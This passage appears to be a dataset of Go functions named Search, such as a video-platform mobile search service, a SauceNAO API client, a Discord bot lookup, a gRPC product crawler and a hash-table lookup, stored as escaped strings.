mobiApp, device, platform, buvid, keyword, duration, order, filtered, lang, fromSource, recommend, parent string, plat int8, rid, highlight, build, pn, ps, isQuery int, old bool, now time.Time) (res *search.Result, err error) {\n\tconst (\n\t\t_newIPhonePGC = 6500\n\t\t_newAndroidPGC = 519010\n\t\t_newIPhoneSearch = 6500\n\t\t_newAndroidSearch = 5215000\n\t\t_newAndroidBSearch = 591200\n\t)\n\tvar (\n\t\tnewPGC, flow, isNewTwitter bool\n\t\tavids []int64\n\t\tavm map[int64]*api.Arc\n\t\towners []int64\n\t\tfollows map[int64]bool\n\t\troomIDs []int64\n\t\tlm map[int64]*live.RoomInfo\n\t\tseasonIDs []int64\n\t\tbangumis map[string]*bangumi.Card\n\t\t//tagSeasonIDs []int32\n\t\ttagBangumis map[int32]*seasongrpc.CardInfoProto\n\t\ttags []int64\n\t\ttagMyInfos []*tagmdl.Tag\n\t\tdynamicIDs []int64\n\t\tdynamicDetails map[int64]*bplus.Detail\n\t\taccInfos map[int64]*account.Info\n\t\tcooperation bool\n\t)\n\t// android 概念版 591205\n\tif (plat == model.PlatAndroid && build >= _newAndroidPGC && build != 591205) || (plat == model.PlatIPhone && build >= _newIPhonePGC && build != 7140) || (plat == model.PlatAndroidB && build >= _newAndroidBSearch) || (plat == model.PlatIPad && build >= search.SearchNewIPad) || (plat == model.PlatIpadHD && build >= search.SearchNewIPadHD) || model.IsIPhoneB(plat) {\n\t\tnewPGC = true\n\t}\n\t// 处理一个ios概念版是 7140,是否需要过滤\n\tif (plat == model.PlatAndroid && build >= _newAndroidSearch) || (plat == model.PlatIPhone && build >= _newIPhoneSearch && build != 7140) || (plat == model.PlatAndroidB && build >= _newAndroidBSearch) || model.IsIPhoneB(plat) {\n\t\tflow = true\n\t}\n\tvar (\n\t\tseasonNum int\n\t\tmovieNum int\n\t)\n\tif (plat == model.PlatIPad && build >= search.SearchNewIPad) || (plat == model.PlatIpadHD && build >= search.SearchNewIPadHD) {\n\t\tseasonNum = s.iPadSearchBangumi\n\t\tmovieNum = s.iPadSearchFt\n\t} else {\n\t\tseasonNum = s.seasonNum\n\t\tmovieNum = s.movieNum\n\t}\n\tall, code, err := s.srchDao.Search(c, mid, zoneid, mobiApp, device, platform, buvid, keyword, duration, order, filtered, fromSource, recommend, parent, plat, seasonNum, movieNum, s.upUserNum, s.uvLimit, s.userNum, s.userVideoLimit, s.biliUserNum, s.biliUserVideoLimit, rid, highlight, build, pn, ps, isQuery, old, now, newPGC, flow)\n\tif err != nil {\n\t\tlog.Error(\"%+v\", err)\n\t\treturn\n\t}\n\tif (model.IsAndroid(plat) && build > s.c.SearchBuildLimit.NewTwitterAndroid) || (model.IsIPhone(plat) && build > s.c.SearchBuildLimit.NewTwitterIOS) {\n\t\tisNewTwitter = true\n\t}\n\tif code == model.ForbidCode || code == model.NoResultCode {\n\t\tres = _emptyResult\n\t\terr = nil\n\t\treturn\n\t}\n\tres = &search.Result{}\n\tres.Trackid = all.Trackid\n\tres.Page = all.Page\n\tres.Array = all.FlowPlaceholder\n\tres.Attribute = all.Attribute\n\tres.NavInfo = s.convertNav(all, plat, build, lang, old, newPGC)\n\tif len(all.FlowResult) != 0 {\n\t\tvar item []*search.Item\n\t\tfor _, v := range all.FlowResult {\n\t\t\tswitch v.Type {\n\t\t\tcase search.TypeUser, search.TypeBiliUser:\n\t\t\t\towners = append(owners, v.User.Mid)\n\t\t\t\tfor _, vr := range v.User.Res {\n\t\t\t\t\tavids = append(avids, vr.Aid)\n\t\t\t\t}\n\t\t\t\troomIDs = append(roomIDs, v.User.RoomID)\n\t\t\tcase search.TypeVideo:\n\t\t\t\tavids = append(avids, v.Video.ID)\n\t\t\tcase search.TypeLive:\n\t\t\t\troomIDs = append(roomIDs, v.Live.RoomID)\n\t\t\tcase search.TypeMediaBangumi, search.TypeMediaFt:\n\t\t\t\tseasonIDs = append(seasonIDs, v.Media.SeasonID)\n\t\t\tcase search.TypeStar:\n\t\t\t\tif v.Star.MID != 0 {\n\t\t\t\t\towners = append(owners, v.Star.MID)\n\t\t\t\t}\n\t\t\t\tif v.Star.TagID != 0 {\n\t\t\t\t\ttags = append(tags, v.Star.TagID)\n\t\t\t\t}\n\t\t\tcase search.TypeArticle:\n\t\t\t\towners = append(owners, v.Article.Mid)\n\t\t\tcase search.TypeChannel:\n\t\t\t\ttags = append(tags, v.Channel.TagID)\n\t\t\t\tif len(v.Channel.Values) > 0 {\n\t\t\t\t\tfor _, vc := range v.Channel.Values {\n\t\t\t\t\t\tswitch vc.Type {\n\t\t\t\t\t\tcase search.TypeVideo:\n\t\t\t\t\t\t\tif vc.Video != nil {\n\t\t\t\t\t\t\t\tavids = append(avids, vc.Video.ID)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t//case search.TypeLive:\n\t\t\t\t\t\t\t//\tif vc.Live != nil {\n\t\t\t\t\t\t\t//\t\troomIDs = append(roomIDs, vc.Live.RoomID)\n\t\t\t\t\t\t\t//\t}\n\t\t\t\t\t\t\t//case search.TypeMediaBangumi, search.TypeMediaFt:\n\t\t\t\t\t\t\t//\tif vc.Media != nil {\n\t\t\t\t\t\t\t//\t\ttagSeasonIDs = append(tagSeasonIDs, int32(vc.Media.SeasonID))\n\t\t\t\t\t\t\t//\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase search.TypeTwitter:\n\t\t\t\tdynamicIDs = append(dynamicIDs, v.Twitter.ID)\n\t\t\t}\n\t\t}\n\t\tg, ctx := errgroup.WithContext(c)\n\t\tif len(owners) != 0 {\n\t\t\tif mid > 0 {\n\t\t\t\tg.Go(func() error {\n\t\t\t\t\tfollows = s.accDao.Relations3(ctx, owners, mid)\n\t\t\t\t\treturn nil\n\t\t\t\t})\n\t\t\t}\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif accInfos, err = s.accDao.Infos3(ctx, owners); err != nil {\n\t\t\t\t\tlog.Error(\"%v\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\tif len(avids) != 0 {\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif avm, err = s.arcDao.Archives2(ctx, avids); err != nil {\n\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\tif len(roomIDs) != 0 {\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif lm, err = s.liveDao.LiveByRIDs(ctx, roomIDs); err != nil {\n\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\tif len(seasonIDs) != 0 {\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif bangumis, err = s.bangumiDao.Card(ctx, mid, seasonIDs); err != nil {\n\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\t//if len(tagSeasonIDs) != 0 {\n\t\t//\tg.Go(func() (err error) {\n\t\t//\t\tif tagBangumis, err = s.bangumiDao.Cards(ctx, tagSeasonIDs); err != nil {\n\t\t//\t\t\tlog.Error(\"%+v\", err)\n\t\t//\t\t\terr = nil\n\t\t//\t\t}\n\t\t//\t\treturn\n\t\t//\t})\n\t\t//}\n\t\tif len(tags) != 0 {\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif tagMyInfos, err = s.tagDao.TagInfos(ctx, tags, mid); err != nil {\n\t\t\t\t\tlog.Error(\"%v \\n\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\tif len(dynamicIDs) != 0 {\n\t\t\tg.Go(func() (err error) {\n\t\t\t\tif dynamicDetails, err = s.bplusDao.DynamicDetails(ctx, dynamicIDs, \"search\"); err != nil {\n\t\t\t\t\tlog.Error(\"%v \\n\", err)\n\t\t\t\t\terr = nil\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t})\n\t\t}\n\t\tif err = g.Wait(); err != nil {\n\t\t\tlog.Error(\"%+v\", err)\n\t\t\treturn\n\t\t}\n\t\tif all.SuggestKeyword != \"\" && pn == 1 {\n\t\t\ti := &search.Item{Title: all.SuggestKeyword, Goto: model.GotoSuggestKeyWord, SugKeyWordType: 1}\n\t\t\titem = append(item, i)\n\t\t} else if all.CrrQuery != \"\" && pn == 1 {\n\t\t\tif (model.IsAndroid(plat) && build > s.c.SearchBuildLimit.QueryCorAndroid) || (model.IsIPhone(plat) && build > s.c.SearchBuildLimit.QueryCorIOS) {\n\t\t\t\ti := &search.Item{Title: fmt.Sprintf(\"已匹配%q的搜索结果\", all.CrrQuery), Goto: model.GotoSuggestKeyWord, SugKeyWordType: 2}\n\t\t\t\titem = append(item, i)\n\t\t\t}\n\t\t}\n\t\tfor _, v := range all.FlowResult {\n\t\t\ti := &search.Item{TrackID: v.TrackID, LinkType: v.LinkType, Position: v.Position}\n\t\t\tswitch v.Type {\n\t\t\tcase search.TypeVideo:\n\t\t\t\tif (model.IsAndroid(plat) && build > s.c.SearchBuildLimit.CooperationAndroid) || (model.IsIPhone(plat) && build > s.c.SearchBuildLimit.CooperationIOS) {\n\t\t\t\t\tcooperation = true\n\t\t\t\t}\n\t\t\t\ti.FromVideo(v.Video, avm[v.Video.ID], cooperation)\n\t\t\tcase search.TypeLive:\n\t\t\t\ti.FromLive(v.Live, lm[v.Live.RoomID])\n\t\t\tcase search.TypeMediaBangumi:\n\t\t\t\ti.FromMedia(v.Media, \"\", model.GotoBangumi, bangumis)\n\t\t\tcase search.TypeMediaFt:\n\t\t\t\ti.FromMedia(v.Media, \"\", model.GotoMovie, bangumis)\n\t\t\tcase search.TypeArticle:\n\t\t\t\ti.FromArticle(v.Article, accInfos[v.Article.Mid])\n\t\t\tcase search.TypeSpecial:\n\t\t\t\ti.FromOperate(v.Operate, model.GotoSpecial)\n\t\t\tcase search.TypeBanner:\n\t\t\t\ti.FromOperate(v.Operate, model.GotoBanner)\n\t\t\tcase search.TypeUser:\n\t\t\t\tif follows[v.User.Mid] {\n\t\t\t\t\ti.Attentions = 1\n\t\t\t\t}\n\t\t\t\ti.FromUser(v.User, avm, lm[v.User.RoomID])\n\t\t\tcase search.TypeBiliUser:\n\t\t\t\tif follows[v.User.Mid] {\n\t\t\t\t\ti.Attentions = 1\n\t\t\t\t}\n\t\t\t\ti.FromUpUser(v.User, avm, lm[v.User.RoomID])\n\t\t\tcase search.TypeSpecialS:\n\t\t\t\ti.FromOperate(v.Operate, model.GotoSpecialS)\n\t\t\tcase search.TypeGame:\n\t\t\t\ti.FromGame(v.Game)\n\t\t\tcase search.TypeQuery:\n\t\t\t\ti.Title = v.TypeName\n\t\t\t\ti.FromQuery(v.Query)\n\t\t\tcase search.TypeComic:\n\t\t\t\ti.FromComic(v.Comic)\n\t\t\tcase search.TypeConverge:\n\t\t\t\tvar (\n\t\t\t\t\taids, rids, artids []int64\n\t\t\t\t\tam map[int64]*api.Arc\n\t\t\t\t\trm map[int64]*live.Room\n\t\t\t\t\tartm map[int64]*article.Meta\n\t\t\t\t)\n\t\t\t\tfor _, c := range v.Operate.ContentList {\n\t\t\t\t\tswitch c.Type {\n\t\t\t\t\tcase 0:\n\t\t\t\t\t\taids = append(aids, c.ID)\n\t\t\t\t\tcase 1:\n\t\t\t\t\t\trids = append(rids, c.ID)\n\t\t\t\t\tcase 2:\n\t\t\t\t\t\tartids = append(artids, c.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tg, ctx := errgroup.WithContext(c)\n\t\t\t\tif len(aids) != 0 {\n\t\t\t\t\tg.Go(func() (err error) {\n\t\t\t\t\t\tif am, err = s.arcDao.Archives2(ctx, aids); err != nil {\n\t\t\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\t\t\terr = nil\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn\n\t\t\t\t\t})\n\t\t\t\t}\n\t\t\t\tif len(rids) != 0 {\n\t\t\t\t\tg.Go(func() (err error) {\n\t\t\t\t\t\tif rm, err = s.liveDao.AppMRoom(ctx, rids); err != nil {\n\t\t\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\t\t\terr = nil\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn\n\t\t\t\t\t})\n\t\t\t\t}\n\t\t\t\tif len(artids) != 0 {\n\t\t\t\t\tg.Go(func() (err error) {\n\t\t\t\t\t\tif artm, err = s.artDao.Articles(ctx, artids); err != nil {\n\t\t\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\t\t\terr = nil\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn\n\t\t\t\t\t})\n\t\t\t\t}\n\t\t\t\tif err = g.Wait(); err != nil {\n\t\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\ti.FromConverge(v.Operate, am, rm, artm)\n\t\t\tcase search.TypeTwitter:\n\t\t\t\ti.FromTwitter(v.Twitter, dynamicDetails, s.c.SearchDynamicSwitch.IsUP, s.c.SearchDynamicSwitch.IsCount, isNewTwitter)\n\t\t\tcase search.TypeStar:\n\t\t\t\tif v.Star.TagID != 0 {\n\t\t\t\t\ti.URIType = search.StarChannel\n\t\t\t\t\tfor _, myInfo := range tagMyInfos {\n\t\t\t\t\t\tif myInfo != nil && myInfo.TagID == v.Star.TagID {\n\t\t\t\t\t\t\ti.IsAttention = myInfo.IsAtten\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else if v.Star.MID != 0 {\n\t\t\t\t\ti.URIType = search.StarSpace\n\t\t\t\t\tif follows[v.Star.MID] {\n\t\t\t\t\t\ti.IsAttention = 1\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ti.FromStar(v.Star)\n\t\t\tcase search.TypeTicket:\n\t\t\t\ti.FromTicket(v.Ticket)\n\t\t\tcase search.TypeProduct:\n\t\t\t\ti.FromProduct(v.Product)\n\t\t\tcase search.TypeSpecialerGuide:\n\t\t\t\ti.FromSpecialerGuide(v.SpecialerGuide)\n\t\t\tcase search.TypeChannel:\n\t\t\t\ti.FromChannel(v.Channel, avm, tagBangumis, lm, tagMyInfos)\n\t\t\t}\n\t\t\tif i.Goto != \"\" {\n\t\t\t\titem = append(item, i)\n\t\t\t}\n\t\t}\n\t\tres.Item = item\n\t\tif plat == model.PlatAndroid && build < search.SearchEggInfoAndroid {\n\t\t\treturn\n\t\t}\n\t\tif all.EggInfo != nil {\n\t\t\tres.EasterEgg = &search.EasterEgg{ID: all.EggInfo.Source, ShowCount: all.EggInfo.ShowCount}\n\t\t}\n\t\treturn\n\t}\n\tvar items []*search.Item\n\tif all.SuggestKeyword != \"\" && pn == 1 {\n\t\tres.Items.SuggestKeyWord = &search.Item{Title: all.SuggestKeyword, Goto: model.GotoSuggestKeyWord}\n\t}\n\t// archive\n\tfor _, v := range all.Result.Video {\n\t\tavids = append(avids, v.ID)\n\t}\n\tif duration == \"0\" && order == \"totalrank\" && rid == 0 {\n\t\tfor _, v := range all.Result.Movie {\n\t\t\tif v.Type == \"movie\" {\n\t\t\t\tavids = append(avids, v.Aid)\n\t\t\t}\n\t\t}\n\t}\n\tif pn == 1 {\n\t\tfor _, v := range all.Result.User {\n\t\t\tfor _, vr := range v.Res {\n\t\t\t\tavids = append(avids, vr.Aid)\n\t\t\t}\n\t\t}\n\t\tif old {\n\t\t\tfor _, v := range all.Result.UpUser {\n\t\t\t\tfor _, vr := range v.Res {\n\t\t\t\t\tavids = append(avids, vr.Aid)\n\t\t\t\t}\n\t\t\t\towners = append(owners, v.Mid)\n\t\t\t\troomIDs = append(roomIDs, v.RoomID)\n\t\t\t}\n\t\t} else {\n\t\t\tfor _, v := range all.Result.BiliUser {\n\t\t\t\tfor _, vr := range v.Res {\n\t\t\t\t\tavids = append(avids, vr.Aid)\n\t\t\t\t}\n\t\t\t\towners = append(owners, v.Mid)\n\t\t\t\troomIDs = append(roomIDs, v.RoomID)\n\t\t\t}\n\t\t}\n\t}\n\tif model.IsOverseas(plat) {\n\t\tfor _, v := range all.Result.LiveRoom {\n\t\t\troomIDs = append(roomIDs, v.RoomID)\n\t\t}\n\t\tfor _, v := range all.Result.LiveUser {\n\t\t\troomIDs = append(roomIDs, v.RoomID)\n\t\t}\n\t}\n\tg, ctx := errgroup.WithContext(c)\n\tif len(owners) != 0 {\n\t\tif mid > 0 {\n\t\t\tg.Go(func() error {\n\t\t\t\tfollows = s.accDao.Relations3(ctx, owners, mid)\n\t\t\t\treturn nil\n\t\t\t})\n\t\t}\n\t}\n\tif len(avids) != 0 {\n\t\tg.Go(func() (err error) {\n\t\t\tif avm, err = s.arcDao.Archives2(ctx, avids); err != nil {\n\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\terr = nil\n\t\t\t}\n\t\t\treturn\n\t\t})\n\t}\n\tif len(roomIDs) != 0 {\n\t\tg.Go(func() (err error) {\n\t\t\tif lm, err = s.liveDao.LiveByRIDs(ctx, roomIDs); err != nil {\n\t\t\t\tlog.Error(\"%+v\", err)\n\t\t\t\terr = nil\n\t\t\t}\n\t\t\treturn\n\t\t})\n\t}\n\tif err = g.Wait(); err != nil {\n\t\tlog.Error(\"%+v\", err)\n\t\treturn\n\t}\n\tif duration == \"0\" && order == \"totalrank\" && rid == 0 {\n\t\tvar promptBangumi, promptFt string\n\t\t// season\n\t\tbangumi := all.Result.Bangumi\n\t\titems = make([]*search.Item, 0, len(bangumi))\n\t\tfor _, v := range bangumi {\n\t\t\tsi := &search.Item{}\n\t\t\tif (model.IsAndroid(plat) && build <= _oldAndroid) || (model.IsIPhone(plat) && build <= _oldIOS) {\n\t\t\t\tsi.FromSeason(v, model.GotoBangumi)\n\t\t\t} else {\n\t\t\t\tsi.FromSeason(v, model.GotoBangumiWeb)\n\t\t\t}\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.Season = items\n\t\t// movie\n\t\tmovie := all.Result.Movie\n\t\titems = make([]*search.Item, 0, len(movie))\n\t\tfor _, v := range movie {\n\t\t\tsi := &search.Item{}\n\t\t\tsi.FromMovie(v, avm)\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.Movie = items\n\t\t// season2\n\t\tmb := all.Result.MediaBangumi\n\t\titems = make([]*search.Item, 0, len(mb))\n\t\tfor k, v := range mb {\n\t\t\tsi := &search.Item{}\n\t\t\tif ((plat == model.PlatIPad && build >= search.SearchNewIPad) || (plat == model.PlatIpadHD && build >= search.SearchNewIPadHD)) && (k == len(mb)-1) && all.PageInfo.MediaBangumi.NumResults > s.iPadSearchBangumi {\n\t\t\t\tpromptBangumi = fmt.Sprintf(\"查看全部番剧 ( %d ) >\", all.PageInfo.MediaBangumi.NumResults)\n\t\t\t}\n\t\t\tsi.FromMedia(v, promptBangumi, model.GotoBangumi, nil)\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.Season2 = items\n\t\t// movie2\n\t\tmf := all.Result.MediaFt\n\t\titems = make([]*search.Item, 0, len(mf))\n\t\tfor k, v := range mf {\n\t\t\tsi := &search.Item{}\n\t\t\tif ((plat == model.PlatIPad && build >= search.SearchNewIPad) || (plat == model.PlatIpadHD && build >= search.SearchNewIPadHD)) && (k == len(mf)-1) && all.PageInfo.MediaFt.NumResults > s.iPadSearchFt {\n\t\t\t\tpromptFt = fmt.Sprintf(\"查看全部影视 ( %d ) >\", all.PageInfo.MediaFt.NumResults)\n\t\t\t}\n\t\t\tsi.FromMedia(v, promptFt, model.GotoMovie, nil)\n\t\t\tsi.Goto = model.GotoAv\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.Movie2 = items\n\t}\n\tif pn == 1 {\n\t\t// upper + user\n\t\tvar tmp []*search.User\n\t\tif old {\n\t\t\ttmp = all.Result.UpUser\n\t\t} else {\n\t\t\ttmp = all.Result.BiliUser\n\t\t}\n\t\titems = make([]*search.Item, 0, len(tmp)+len(all.Result.User))\n\t\tfor _, v := range all.Result.User {\n\t\t\tsi := &search.Item{}\n\t\t\tsi.FromUser(v, avm, lm[v.RoomID])\n\t\t\tif follows[v.Mid] {\n\t\t\t\tsi.Attentions = 1\n\t\t\t}\n\t\t\titems = append(items, si)\n\t\t}\n\t\tif len(items) == 0 {\n\t\t\tfor _, v := range tmp {\n\t\t\t\tsi := &search.Item{}\n\t\t\t\tsi.FromUpUser(v, avm, lm[v.RoomID])\n\t\t\t\tif follows[v.Mid] {\n\t\t\t\t\tsi.Attentions = 1\n\t\t\t\t}\n\t\t\t\tif old {\n\t\t\t\t\tsi.IsUp = true\n\t\t\t\t}\n\t\t\t\titems = append(items, si)\n\t\t\t}\n\t\t}\n\t\tres.Items.Upper = items\n\t}\n\titems = make([]*search.Item, 0, len(all.Result.Video))\n\tfor _, v := range all.Result.Video {\n\t\tsi := &search.Item{}\n\t\tsi.FromVideo(v, avm[v.ID], cooperation)\n\t\titems = append(items, si)\n\t}\n\tres.Items.Archive = items\n\t// live room\n\tif model.IsOverseas(plat) {\n\t\titems = make([]*search.Item, 0, len(all.Result.LiveRoom))\n\t\tfor _, v := range all.Result.LiveRoom {\n\t\t\tsi := &search.Item{}\n\t\t\tsi.FromLive(v, lm[v.RoomID])\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.LiveRoom = items\n\t\t// live user\n\t\titems = make([]*search.Item, 0, len(all.Result.LiveUser))\n\t\tfor _, v := range all.Result.LiveUser {\n\t\t\tsi := &search.Item{}\n\t\t\tsi.FromLive(v, lm[v.RoomID])\n\t\t\titems = append(items, si)\n\t\t}\n\t\tres.Items.LiveUser = items\n\t}\n\treturn\n}", "func (c *Client) Search(ctx context.Context, r *SearchRequest) (*SearchResponse, error) {\n\treq, err := c.requestForSearch(ctx, r)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"saucenao search: %w\", err)\n\t}\n\tresp, err := c.C.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"saucenao search: %s\", err)\n\t}\n\tdefer resp.Body.Close()\n\tswitch resp.StatusCode {\n\tcase 200:\n\tcase 429:\n\t\treturn nil, fmt.Errorf(\"saucenao search: %w\", QuotaError{})\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"saucenao search: unexpected status %v\", resp.Status)\n\t}\n\td, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"saucenao search: %s\", err)\n\t}\n\tvar sr SearchResponse\n\tif err := json.Unmarshal(d, &sr); err != nil {\n\t\treturn nil, fmt.Errorf(\"saucenao search: %s\", err)\n\t}\n\treturn &sr, nil\n}", "func Search(cmdInfo CommandInfo) {\n\tif len(cmdInfo.CmdOps) == 1 {\n\t\treturn\n\t}\n\tif strings.ToLower(cmdInfo.CmdOps[1]) == \"north\" || strings.ToLower(cmdInfo.CmdOps[1]) == \"south\" {\n\t\t// ByMonth search\n\t\tbyMonth(cmdInfo.CmdOps[1:], cmdInfo)\n\t\treturn\n\t}\n\tformatStr := toLowerAndFormat(cmdInfo.CmdOps[1:])\n\tentry, err := cmdInfo.Service.Entry.ByName(formatStr, \"bug_and_fish\")\n\tsearchItem := formatName(cmdInfo.CmdOps[1:])\n\tif err != nil {\n\t\t// If entry was not found in database\n\t\tword := strings.Split(searchItem, \" \")\n\t\tvals := cmdInfo.Service.Entry.FindLike(toLowerAndFormat(word), \"bug_and_fish\")\n\t\tvar fields []*discordgo.MessageEmbedField\n\t\tfor _, val := range vals {\n\t\t\tfields = append(fields, createFields(strings.Title(val.Type), strings.Title(removeUnderscore(val.Name)), true))\n\t\t}\n\t\tif len(fields) == 0 {\n\t\t\t// If no similar entries were found\n\t\t\tmsg := cmdInfo.createMsgEmbed(searchItem, errThumbURL, \"No similar entries found.\", errColor, fields)\n\t\t\tcmdInfo.Ses.ChannelMessageSendEmbed(cmdInfo.BotChID, msg)\n\t\t\treturn\n\t\t}\n\t\tmsg := cmdInfo.createMsgEmbed(searchItem, errThumbURL, \"Entry Not Found in Database... Perhaps you meant...?\", errColor, fields)\n\t\tcmdInfo.Ses.ChannelMessageSendEmbed(cmdInfo.BotChID, msg)\n\t\treturn\n\t}\n\tnHemi, sHemi := parseHemi(entry.NorthSt, entry.NorthEnd, entry.SouthSt, entry.SouthEnd)\n\tfields := format(\n\t\tcreateFields(\"Price\", strconv.Itoa(entry.SellPrice)+\" Bells\", true),\n\t\tcreateFields(\"Location\", removeUnderscore(entry.Location), true),\n\t\tcreateFields(\"Time\", removeUnderscore(entry.Time), false),\n\t\tcreateFields(\"Northern Hemisphere\", nHemi, false),\n\t\tcreateFields(\"Southern Hemisphere\", sHemi, false),\n\t)\n\tmsg := cmdInfo.createMsgEmbed(searchItem, entry.Image, strings.Title(entry.Type), searchColor, fields)\n\tcmdInfo.Ses.ChannelMessageSendEmbed(cmdInfo.BotChID, msg)\n}", "func (s *gRPCsrv) Search(q *pb.Query, stream pb.Crawler_SearchServer) error {\n\tif q.Key == \"\" {\n\t\treturn badRequest(\"Key must not be empty\")\n\t}\n\n\t// create query\n\td := make(chan bool)\n\topt := mart.Query{\n\t\tKey: q.Key,\n\t\tOrder: mart.ByPrice,\n\t\tDone: func() { d <- true },\n\t}\n\tif q.Order == pb.Query_POPULAR {\n\t\topt.Order = mart.ByPopular\n\t}\n\n\t// find if mart available\n\tvar ms []*mart.Mart\n\tif q.Mart != \"\" {\n\t\tm, err := mart.Open(q.Mart)\n\t\tif err != nil {\n\t\t\treturn noFound(\"Mart \" + q.Mart + \" not available\")\n\t\t}\n\n\t\tms = append(ms, m)\n\t} else {\n\t\tms = mart.All()\n\t\tif len(ms) == 0 {\n\t\t\treturn noFound(\"No mart available\")\n\t\t}\n\t}\n\n\t// create context and channel; make search request\n\tctx, quit := context.WithCancel(stream.Context())\n\tdefer quit()\n\n\tput := make(chan []mart.Product)\n\tche := make(chan error)\n\tfor i := range ms {\n\t\tms[i].Search(ctx, opt, put, che)\n\t}\n\n\t// listen for search response\n\tvar sent, done int64\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tlog.Println(\"Search keyword\", q.Key, \"cancelled\")\n\t\t\treturn nil\n\t\tcase ps := <-put:\n\t\t\tfor i := range ps {\n\t\t\t\tsent++\n\t\t\t\tif q.Num > 0 && sent > q.Num { // reach max number, return\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\n\t\t\t\tif err := stream.Send(&pb.Product{\n\t\t\t\t\tName: ps[i].Name,\n\t\t\t\t\tImage: ps[i].Image,\n\t\t\t\t\tPage: ps[i].Page,\n\t\t\t\t\tPrice: int64(ps[i].Price),\n\t\t\t\t\tMart: ps[i].Mart,\n\t\t\t\t}); err != nil {\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t\treturn nil // connection lost?\n\t\t\t\t}\n\t\t\t}\n\t\tcase err := <-che:\n\t\t\tlog.Println(err)\n\t\tcase <-d:\n\t\t\tdone++\n\t\t\tif done == int64(len(ms)) { // all jobs are done\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}\n}", "func (_TestABI *TestABITransactor) Search(opts *bind.TransactOpts, ct Struct0) (*types.Transaction, error) {\n\treturn _TestABI.contract.Transact(opts, \"search\", ct)\n}", "func Search(w http.ResponseWriter, r *http.Request) {\n\tviewData := BaseViewData(w, r)\n\n\ttermMap := utils.GetSearchTermsForString(r.FormValue(\"q\"), true)\n\tterms := make([]string, len(termMap))\n\ti := 0\n\tfor term := range termMap {\n\t\tterms[i] = term\n\t\ti++\n\t}\n\n\tpageNumStr := \"1\"\n\tif len(r.FormValue(\"page\")) > 0 {\n\t\tpageNumStr = r.FormValue(\"page\")\n\t}\n\n\tpage, err := strconv.Atoi(pageNumStr)\n\tif err != nil {\n\t\tviewData.NotFound(w)\n\t\treturn\n\t}\n\t// Correct for the human readable format for page numbers used\n\t// by the client here\n\tpage = page - 1\n\n\tplaceID := -1\n\tif viewData.Session != nil {\n\t\tplaceID = viewData.Session.User.PlaceID\n\t}\n\n\tlistings := []models.Listing{}\n\tif len(terms) > 0 {\n\t\tlistings, err = models.DoSearchForTerms(Base.Db, terms, page, placeID)\n\t\tif err != nil {\n\t\t\tviewData.InternalError(w)\n\t\t\treturn\n\t\t}\n\t}\n\n\tnumPages := models.GetPageCountForTerms(Base.Db, terms, placeID)\n\n\tviewData.Data = searchViewData{\n\t\tListings: listings,\n\t\tQuery: r.FormValue(\"q\"),\n\t\tPage: page + 1,\n\t\tStartOffset: page*50 + 1,\n\t\tEndOffset: page*50 + len(listings),\n\t\tMaxTotal: numPages * 50,\n\t\tOutOf: numPages,\n\t}\n\tRenderView(w, \"search#search\", viewData)\n}", "func (s *Service) Search() *SearchCall {\n\tc := &SearchCall{s: s, urlParams_: make(gensupport.URLParams)}\n\treturn c\n}", "func (s *Service) Search() *SearchCall {\n\tc := &SearchCall{s: s, urlParams_: make(gensupport.URLParams)}\n\treturn c\n}", "func Search(query string) (name, infohash string) {\n\tfor providerKey, _ := range providers {\n\t\tname, infohash = SearchProvider(query, providerKey)\n\t}\n\treturn name, infohash\n}", "func (t *openAddressing) Search(key string) interface{} {\n\tround := 0\n\tfor round != len(t.values) {\n\t\thash := t.hash(key, round)\n\t\tslot := t.values[hash]\n\t\tif slot != nil && !slot.deleted && slot.key == key {\n\t\t\treturn slot.value\n\t\t}\n\t\tround++\n\t}\n\treturn nil\n}", "func (repo *Repo) Search(query string) ([]Codepoint, error) {\n\tquery = repo.prepareQuery(query)\n\tvar 